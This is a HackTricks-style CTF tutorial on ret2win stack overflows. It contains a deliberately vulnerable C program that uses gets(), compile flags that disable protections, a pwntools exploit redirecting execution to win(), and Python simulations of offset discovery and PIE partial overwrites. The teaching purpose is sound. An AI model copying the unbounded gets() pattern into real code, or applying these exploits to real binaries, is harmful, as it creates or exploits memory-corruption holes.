Ret2win


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Basic Information

Ret2win challenges are a popular category in Capture The Flag (CTF) competitions, particularly in tasks that involve binary exploitation. The goal is to exploit a vulnerability in a given binary to execute a specific function that the program never calls on its own, often named win, flag, or similar. When executed, this function typically prints the flag or a success message. The challenge usually comes down to overwriting the saved return address on the stack so that execution is redirected to that function. Here is a more detailed explanation with examples:

C Example

Consider a simple C program with a vulnerability and a win function that we intend to call:

```c
#include <stdio.h>
#include <string.h>

void win() {
    printf("Congratulations! You've called the win function.\n");
}

void vulnerable_function() {
    char buf[64];
    gets(buf); // Dangerous: gets() never checks the size of the input, so a long line overflows buf
}

int main() {
    vulnerable_function();
    return 0;
}
```

To compile this program without stack protections and as a non-PIE binary, so that the address of win stays fixed even when ASLR is enabled, you can use the following command:

```sh
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
```
  • -m32: Build the program as a 32-bit binary (optional, but common in CTF challenges; it requires the 32-bit toolchain libraries, e.g. gcc-multilib on Debian/Ubuntu).
  • -fno-stack-protector: Disable stack canaries, so the overflow reaches the saved return address without being detected.
  • -z execstack: Make the stack executable. A plain ret2win does not need this (no shellcode is injected), but it is a common setting in CTF builds.
  • -no-pie: Disable Position Independent Executable so that the address of the win function is fixed and does not change between runs.
  • -o vulnerable: Name the output file vulnerable.

Python Exploit using Pwntools

For the exploit we will use pwntools, a powerful CTF framework for writing exploits. The exploit script builds a payload that overflows the buffer and overwrites the saved return address with the address of the win function.

```python
from pwn import *

# Load the ELF first: this sets the context (arch, bits, endianness) for p32()
# and gives access to the symbol table, so the address need not be hard-coded.
elf = context.binary = ELF('./vulnerable')
p = process(elf.path)

# Address of win. The binary is compiled with -no-pie, so the address in the ELF
# is also the runtime address (the same value objdump shows, e.g. 0x08048456).
win_addr = elf.symbols['win']

# Offset to the saved return address: 64 bytes of buf plus the 4-byte saved EBP = 68.
# The compiler may insert alignment padding, so if this fails determine the real
# offset from a crash with cyclic()/cyclic_find().
offset = 68
payload = b'A' * offset + p32(win_addr)

# gets() reads up to the newline, so sendline() delivers the whole payload
p.sendline(payload)
p.interactive()
```

To find the address of the win function you can use gdb, objdump, or any other tool that lets you inspect the binary. For example, with objdump:

```sh
objdump -d vulnerable | grep '<win>:'
```

This prints the line that opens the disassembly of win; its first field is the function's start address (e.g. 08048456 <win>:). In gdb, `p win` or `info address win` gives the same value, and pwntools resolves it with ELF('./vulnerable').symbols['win'].

The Python script sends a carefully crafted input which, when processed by vulnerable_function, overflows the buffer and overwrites the saved return address on the stack with the address of win. When vulnerable_function returns, instead of going back to main, it jumps to win and the message is printed.
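The 68-byte offset used above is an assumption about the frame layout; the compiler is free to insert alignment padding between buf and the saved EBP, so in practice the offset is measured, not guessed. The following added example (not code from the original page or from pwntools) reimplements that workflow without external dependencies: it generates a de Bruijn cyclic pattern, feeds it to a constructed model of vulnerable_function's stack frame (standing in for a real crash under gdb), recovers the offset from the value that landed in the return address slot, and then builds the ret2win payload. The frame sizes, the 0x08048500 placeholder return address and the 0x08048456 win address are constructed values.

```python
import functools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


@functools.lru_cache(maxsize=None)
def cyclic(length, n=4, alphabet=ALPHABET):
    """Return `length` bytes of a de Bruijn sequence in which every n-byte window
    is unique (the same idea as pwntools' cyclic()). Whatever n bytes end up in
    EIP after the crash therefore identify exactly one position in the input."""
    k = len(alphabet)
    assert length <= k ** n, "pattern would repeat; raise n or enlarge the alphabet"
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:  # enough output, stop early
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def cyclic_find(value, n=4, alphabet=ALPHABET):
    """Offset in the cyclic pattern of the bytes that landed in the saved return
    address. `value` is either the raw bytes or the integer gdb shows in EIP/RIP
    (little-endian; on 64-bit only the low 4 bytes are needed, as in pwntools)."""
    if isinstance(value, int):
        value = value.to_bytes(max(n, (value.bit_length() + 7) // 8), "little")[:n]
    idx = cyclic(len(alphabet) ** n, n, alphabet).find(value)
    if idx < 0:
        raise ValueError("value does not come from the pattern")
    return idx


def simulate_vulnerable_function(data, buf_size=64, pad=0, word=4):
    """Constructed model of vulnerable_function()'s stack frame (not a real
    process): buf, optional compiler alignment padding, the saved EBP/RBP, then
    the saved return address. gets() copies everything up to the newline with no
    bounds check. Returns the value left in the return address slot, i.e. what
    EIP/RIP holds once the function returns."""
    fmt = "<I" if word == 4 else "<Q"
    ret_off = buf_size + pad + word
    frame = bytearray(ret_off + word)
    struct.pack_into(fmt, frame, ret_off, 0x08048500)  # constructed original return address
    data = data.split(b"\n", 1)[0]
    n = min(len(data), len(frame))
    frame[:n] = data[:n]
    return struct.unpack_from(fmt, frame, ret_off)[0]


def find_offset(buf_size=64, pad=0, word=4):
    """Step 1 of the ret2win workflow: crash with a cyclic pattern and read the
    offset of the saved return address back from the value that overwrote it."""
    probe = cyclic(256)
    eip = simulate_vulnerable_function(probe, buf_size, pad, word)
    return cyclic_find(eip)


def build_payload(offset, win_addr, word=4):
    """Step 2: padding up to the return address, then win's address packed
    little-endian (the equivalent of b'A' * offset + p32(win_addr))."""
    fmt = "<I" if word == 4 else "<Q"
    return b"A" * offset + struct.pack(fmt, win_addr)


if __name__ == "__main__":
    off = find_offset()
    print("offset to return address:", off)                      # 68 for buf[64] + saved EBP
    print("with 8 bytes of alignment padding:", find_offset(pad=8))  # 76, not 68
    payload = build_payload(off, 0x08048456)
    print("EIP after overflow: %#x" % simulate_vulnerable_function(payload))  # 0x8048456
```

Against a real binary the probe is what you send (`p.sendline(cyclic(256))`), and `value` is the EIP shown by gdb or the core dump after the crash; the rest of the calculation is identical.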

Protections

  • PIE should be disabled so that the address of win is the same across executions; otherwise the function is loaded at a different address each run and you need some leak to find out where win ended up. In some cases, when the function that causes the overflow is read or similar (one that writes exactly the bytes you supply, without a terminating NUL), you can do a Partial Overwrite of only the lowest 1 or 2 bytes of the saved return address to redirect it to win while leaving the randomized high bytes untouched. Because PIE binaries are mapped at page granularity, ASLR never changes the last three hex nibbles (12 bits) of an address, so a 2-byte overwrite leaves only one unknown nibble and you have a 1/16 chance of hitting the right return address per try. A 1-byte overwrite needs no guessing at all, but only works when win lies in the same 256-byte window as the original return address.
  • Stack Canaries should also be disabled, or the overwritten saved EIP will never be used: the canary check fails first and the program aborts before the function returns (unless the canary can be leaked or brute-forced).
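As an added example (not part of the original page), the model below works through the partial-overwrite argument numerically: a page-aligned PIE base with random high bits, a return site in main() and a win() at constructed file offsets 0x11e0 and 0x1189 (assumed values), and an overflow that clobbers only the lowest 1 or 2 bytes of the saved return address. It enumerates the guesses an attacker would have to make, estimates the blind success rate over random bases, and also shows the precondition the text implies: a 1-byte overwrite only works when win and the return site share the same 256-byte window.

```python
import random

PAGE = 0x1000  # PIE images are mapped at page granularity, so ASLR never touches the low 12 bits


def partial_overwrite(saved_ret, new_low, nbytes):
    """Model a short overflow (read()/recv() with a controlled length) that only
    clobbers the `nbytes` lowest bytes of the saved return address on a
    little-endian stack. The untouched high bytes keep their randomized value."""
    mask = (1 << (8 * nbytes)) - 1
    return (saved_ret & ~mask) | (new_low & mask)


def enumerate_guesses(base, ret_site_off, win_off, nbytes):
    """Enumerate every value an attacker could write into the low `nbytes` bytes.
    `base` is the PIE load address (unknown to the attacker), `ret_site_off` the
    file offset main() returns to, `win_off` the file offset of win(). Returns
    (winning guesses, number of possible guesses): the success chance per try is
    len(hits) / total. Assumed offsets; constructed layout."""
    saved_ret = base + ret_site_off
    target = base + win_off
    # The low 12 bits are known from the ELF; any overwritten bits above them
    # must be guessed (4 bits for a 2-byte overwrite, none for 1 byte).
    unknown_bits = max(8 * nbytes - 12, 0)
    hits = []
    for guess in range(1 << unknown_bits):
        new_low = (guess << 12) | (win_off & 0xFFF)
        if partial_overwrite(saved_ret, new_low, nbytes) == target:
            hits.append(guess)
    return hits, 1 << unknown_bits


def success_rate(trials, ret_site_off, win_off, nbytes, seed=1):
    """Monte Carlo estimate over random PIE bases of a blind attempt that always
    writes 0 for the unknown nibble: about 1/16 for nbytes=2, and 1.0 for
    nbytes=1 when win() and the return site share a 256-byte window."""
    rng = random.Random(seed)
    wins = 0
    for _ in range(trials):
        base = 0x555555554000 + rng.randrange(1 << 28) * PAGE  # constructed x86-64 PIE base
        new_low = win_off & 0xFFF
        if partial_overwrite(base + ret_site_off, new_low, nbytes) == base + win_off:
            wins += 1
    return wins / trials


if __name__ == "__main__":
    base = 0x555555554000
    print("2-byte overwrite:", enumerate_guesses(base, 0x11e0, 0x1189, 2))  # ([5], 16): one nibble to guess
    print("1-byte overwrite:", enumerate_guesses(base, 0x11e0, 0x1189, 1))  # ([0], 1): deterministic
    print("1-byte, win in another 256-byte window:", enumerate_guesses(base, 0x11e0, 0x1089, 1))  # ([], 1)
    print("blind 2-byte success rate: %.3f" % success_rate(4000, 0x11e0, 0x1189, 2))  # about 0.0625
```

With gets() or strcpy() the same trick does not work cleanly: they append a NUL after the copied data, so a 2-byte overwrite also zeroes the third byte of the return address. That is why the text requires read() or a similar length-controlled primitive.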

Other Examples & References

ARM64 Example

{{#ref}} ret2win-arm64.md {{#endref}}
